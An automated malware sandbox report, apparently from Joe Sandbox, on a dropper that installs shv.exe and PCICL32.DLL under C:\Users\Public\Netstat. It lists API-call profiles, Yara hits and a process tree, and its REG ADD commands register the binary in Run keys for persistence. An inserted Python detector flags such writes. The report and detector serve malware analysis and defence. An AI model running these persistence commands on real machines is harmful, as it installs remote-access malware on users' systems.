Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11032EE0 GetClipboardFormatNameA,SetClipboardData, 9_2_11032EE0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree, 6_2_110321E0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor, 6_2_110076F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 6_2_11113880
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 9_2_11113880
Source: Yara match File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 6_2_111158B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 9_2_111158B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E78C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E78C2F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec, 6_2_1115DB40
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 9_2_1102D330
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A1F20 0_2_00007FF70E7A1F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E785E24 0_2_00007FF70E785E24
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7ACE88 0_2_00007FF70E7ACE88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E78F930 0_2_00007FF70E78F930
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E794928 0_2_00007FF70E794928
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B0754 0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79A4AC 0_2_00007FF70E79A4AC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A3484 0_2_00007FF70E7A3484
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7AB190 0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79AF18 0_2_00007FF70E79AF18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C2080 0_2_00007FF70E7C2080
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B0754 0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A8DF4 0_2_00007FF70E7A8DF4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A2D58 0_2_00007FF70E7A2D58
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A4B98 0_2_00007FF70E7A4B98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E795B60 0_2_00007FF70E795B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79BB90 0_2_00007FF70E79BB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B8C1C 0_2_00007FF70E7B8C1C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B89A0 0_2_00007FF70E7B89A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A3964 0_2_00007FF70E7A3964
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79C96C 0_2_00007FF70E79C96C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E781AA4 0_2_00007FF70E781AA4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A2AB0 0_2_00007FF70E7A2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C5AF8 0_2_00007FF70E7C5AF8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E791A48 0_2_00007FF70E791A48
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7BFA94 0_2_00007FF70E7BFA94
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7BC838 0_2_00007FF70E7BC838
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E784840 0_2_00007FF70E784840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79B534 0_2_00007FF70E79B534
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C2550 0_2_00007FF70E7C2550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7876C0 0_2_00007FF70E7876C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A53F0 0_2_00007FF70E7A53F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A21D0 0_2_00007FF70E7A21D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79F180 0_2_00007FF70E79F180
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E78C2F0 0_2_00007FF70E78C2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E78A310 0_2_00007FF70E78A310
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79126C 0_2_00007FF70E79126C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E787288 0_2_00007FF70E787288
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110733B0 6_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11029590 6_2_11029590
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11061C90 6_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11033010 6_2_11033010
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11163220 6_2_11163220
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1102B5F0 6_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11167485 6_2_11167485
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110454F0 6_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1101B760 6_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111258B0 6_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1101BBA0 6_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11087C60 6_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1116DFCB 6_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11070090 6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11080480 6_2_11080480
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1115E980 6_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1101C9C0 6_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110088AB 6_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11050D80 6_2_11050D80
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1CA980 6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1F3DB8 6_2_6D1F3DB8
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1F4910 6_2_6D1F4910
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1F3923 6_2_6D1F3923
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11061C90 9_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11033010 9_2_11033010
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110733B0 9_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11163220 9_2_11163220
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11029590 9_2_11029590
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1102B5F0 9_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11167485 9_2_11167485
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110454F0 9_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1101B760 9_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111258B0 9_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1101BBA0 9_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11087C60 9_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1116DFCB 9_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11070090 9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11080480 9_2_11080480
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1115E980 9_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1101C9C0 9_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110088AB 9_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11050D80 9_2_11050D80
Source: C:\Users\Public\Netstat\shv.exe Process token adjusted: Security
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 110B7A20 appears 43 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11146450 appears 1223 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 6D1C30A0 appears 31 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11146EC0 appears 48 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 6D1D7D00 appears 67 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 6D1C6F50 appears 72 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 1116F010 appears 74 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11029450 appears 2011 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 111603E3 appears 82 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11173663 appears 40 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 1105DD10 appears 585 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11081BB0 appears 85 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Netstat\shv.exe Code function: String function: 11164010 appears 64 times
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E9617000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: classification engine Classification label: mal96.rans.evad.winEXE@20/13@1/2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E78B6D8 GetLastError,FormatMessageW,LocalFree, 0_2_00007FF70E78B6D8
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 6_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle, 6_2_1109D4D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 9_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1109D4D0 AdjustTokenPrivileges,CloseHandle, 9_2_1109D4D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize, 6_2_11115B70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00007FF70E7A8624
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 6_2_11127E10
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat
Source: C:\Users\Public\Netstat\shv.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: unknown Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
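The process tree above shows the persistence step of the chain: netsup.bat calls reg.exe three times, writing the value "Netstat" pointing at C:\Users\Public\Netstat\shv.exe. Only the first two keys (HKCU and HKLM ...\CurrentVersion\Run) are locations Windows consults at logon; HKCU\SOFTWARE\Software\Supservice\Run is not an autostart location, so by itself it gives the binary no persistence. The Python below, an added example that is not code from this report, from Joe Sandbox or from NetSupport, parses process-creation command lines of that shape and alerts only on a real autostart key whose data lands in a user-writable folder. The event layout (pid, cmdline) is assumed; the sample command lines are constructed from the process tree here plus one made-up benign updater entry.

```python
"""Flag reg.exe persistence into an autostart Run key from a user-writable path.

Added example, not code from the report, from Joe Sandbox or from NetSupport.
The event layout (pid, cmdline) is assumed; the sample command lines are
constructed from the report's process tree plus one made-up benign entry.
"""
import re
from dataclasses import dataclass

# Registry paths below the hive (lower-case) that Windows runs at logon.
AUTOSTART_KEYS = frozenset({
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
    "software\\microsoft\\windows\\currentversion\\policies\\explorer\\run",
    "software\\wow6432node\\microsoft\\windows\\currentversion\\run",
})

# Folders a standard user can write to without elevation.
SUSPICIOUS_DIRS = (
    "c:\\users\\public\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
    "c:\\programdata\\", "c:\\windows\\temp\\",
)

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse_reg_add(cmdline):
    """Return (key, value_name, data) for a `reg add` command line, else None."""
    toks = tokenize(cmdline)
    if len(toks) < 3:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    key, value_name, data = toks[2], "(Default)", ""
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/d", "/t") and i + 1 < len(toks):
            if flag == "/v":
                value_name = toks[i + 1]
            elif flag == "/d":
                data = toks[i + 1]
            i += 2
        else:          # /f, /ve, /reg:32 ... carry no value we need
            i += 1
    return key, value_name, data


def is_autostart(key):
    """True only for keys Windows itself consults at logon."""
    hive, _, path = key.lower().partition("\\")
    return hive in ("hkcu", "hklm", "hkey_current_user", "hkey_local_machine") \
        and path in AUTOSTART_KEYS


def in_suspicious_dir(path):
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


@dataclass(frozen=True)
class Finding:
    pid: int
    key: str
    value_name: str
    target: str
    autostart: bool
    suspicious_dir: bool


def scan(events):
    """One Finding per `reg add` event; other command lines are ignored."""
    out = []
    for ev in events:
        parsed = parse_reg_add(ev["cmdline"])
        if parsed is None:
            continue
        key, name, data = parsed
        out.append(Finding(ev["pid"], key, name, data,
                           is_autostart(key), in_suspicious_dir(data)))
    return out


def persistence_alerts(events):
    """Findings that give a binary in a user-writable folder real logon persistence."""
    return [f for f in scan(events) if f.autostart and f.suspicious_dir]


# Constructed from the report's process tree; pids are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": 'REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
                            '/V "Netstat" /t REG_SZ /F /D "C:\\Users\\Public\\Netstat\\shv.exe"'},
    {"pid": 102, "cmdline": 'REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
                            '/V "Netstat" /t REG_SZ /F /D "C:\\Users\\Public\\Netstat\\shv.exe"'},
    {"pid": 103, "cmdline": 'REG ADD "HKCU\\SOFTWARE\\Software\\Supservice\\Run" '
                            '/V "Netstat" /t REG_SZ /F /D "C:\\Users\\Public\\Netstat\\shv.exe"'},
    {"pid": 104, "cmdline": 'C:\\Users\\Public\\Netstat\\shv.exe'},
    # made-up benign entry: a vendor updater registered from Program Files
    {"pid": 105, "cmdline": 'C:\\Windows\\System32\\reg.exe add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
                            '/v ExampleUpdater /d "C:\\Program Files\\Example\\updater.exe" /f'},
]

if __name__ == "__main__":
    for f in persistence_alerts(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.key}\\{f.value_name} -> {f.target}")
```

Run against the constructed events, only the HKCU and HKLM CurrentVersion\Run writes alert; the Supservice key is parsed but reported with autostart=False, and the Program Files updater is parsed but reported with suspicious_dir=False. Keying the rule on the registry path rather than on the value name "Netstat" matters because the name is arbitrary and will differ between campaigns.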
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: apphelp.dll
